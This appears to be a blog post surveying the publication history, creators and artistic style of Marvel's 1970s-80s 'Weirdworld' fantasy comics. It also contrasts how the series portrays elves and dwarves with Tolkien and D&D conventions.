So cried the cover blurb on Marvel Premiere #38, the second appearance--first in color--of Marvel's decidedly un-Sword & Sorcery fantasy series. As such, it stands as an interesting artifact in comics history, fitting neither with the pulp inspired fantasies of earlier comics, or the D&D-influenced ones that were to follow.

The titular "Weirdworld" is a fantasy land inhabited by dwarves, elves, and goblins, and perpetually under threat from wicked sorcerers and other magical menaces. Its protagonists are two elves--Tyndall and Velanna--who are outcasts with mysterious (even to themselves) pasts. Their obligatory companion and comedy relief is Mud-Butt, an irascible dwarf.

Tyndall starts out solo and in black and white in Marvel Super Action #1, where he good-naturedly undertakes a quest on behalf of bigoted dwarvish villagers in "An Ugly Mirror on Weirdworld" (1976). Velanna joins him by that story's end, and they run afoul of a rejuvenation-seeking sorcerer in Marvel Premiere #38 (1977). Their next appearance, publication wise, would see them travelling with Mud-Butt to the City of Seven Dark Delights and crossing paths with the sorcerous Dark Riders, who were seeking to resurrect their fallen god, Darklens. The defeat of Darklens and the discovery of other elves, were related in the three part epic, "Warriors of the Shadow Realm" in Marvel Super Special #11-13 (1979). Epic Illustrated #9, and #11-13, in 1981 and '82, featured the "Dragonmaster of Klarn" storyline, that revealed more about the mysterious elves and their relationship with dragons. Finally, in 1986, Marvel Fanfare vol. 1 #24-26 saw a lost tale of Weirdworld--the first meeting of Mudd-Butt and the two elves, and vanquishing of yet another evil sorcerer. Work on this story had actually began back in the seventies, but it had been left unfinished.

Weirdworld was the creation of Doug Moench, and artistically designed, at least initially, by Mike Ploog. "Warriors of the Shadow Realm" had art by John Buscema, and featured a redesigned Mud-Butt--though no one knew it, since Ploog's original design didn't see print until nearly a decade later. Pat Roderick provided the pencils for the last two Marvel Fanfare issues.


I would have thought Weirdworld bore the influences of Bakshi's animated fantasy features Wizards and The Lord of the Rings--but it actually predates both of them. Any artistic resemblance may be due to Ploog's reported involvement in those two projects, or it may be coincidental. Tolkien would seem to be a likely source, but Moench maintained in that he had never read The Lord of the Rings in his essay on Weirdworld's origins in Marvel Super Special #11. He did admit to having read The Hobbit in high school, but denied remembering much about it.

Despite the superficial "Tolkienian" elements, I think we see in Weirdworld an artifact of a time when The Lord of the Rings-style portrayals of elves and dwarves (by way of D&D) were not taken as standard. The dwarves of Weirdworld bear more resemblance to the Munchikins of Oz than the ones from the Mines of Moria. Buscema's artwork in particular gives most of Weirdworld a kind of fairy-tale-ish look (inspired by Arthur Rackham, among others) that reminds me a little of later works by Brian Froud. The elves are likewise not wise and puissant beings superior to men in every way. Instead, their short and maybe more like non-Tolkien, pop-culture elves--like the sort that sell cookies or work for Santa. They're probably part of the pre-Tolkien lineage that influenced early D&D art (as James Maliszewski outlined here) and certainly seem to be kin of hapless Indel in the 80s D&D comic book ads.

Weirdworld offers a portrayal of stock rpg elements refreshingly free from the influence of the rising cultural familiarity with The Lord of the Rings, and the ouroboros-like D&D-ization of fantasy. Nothing in it is new, but their might be something there worth revisiting.

Pages

Subscribe to Furiously Eclectic People aggregator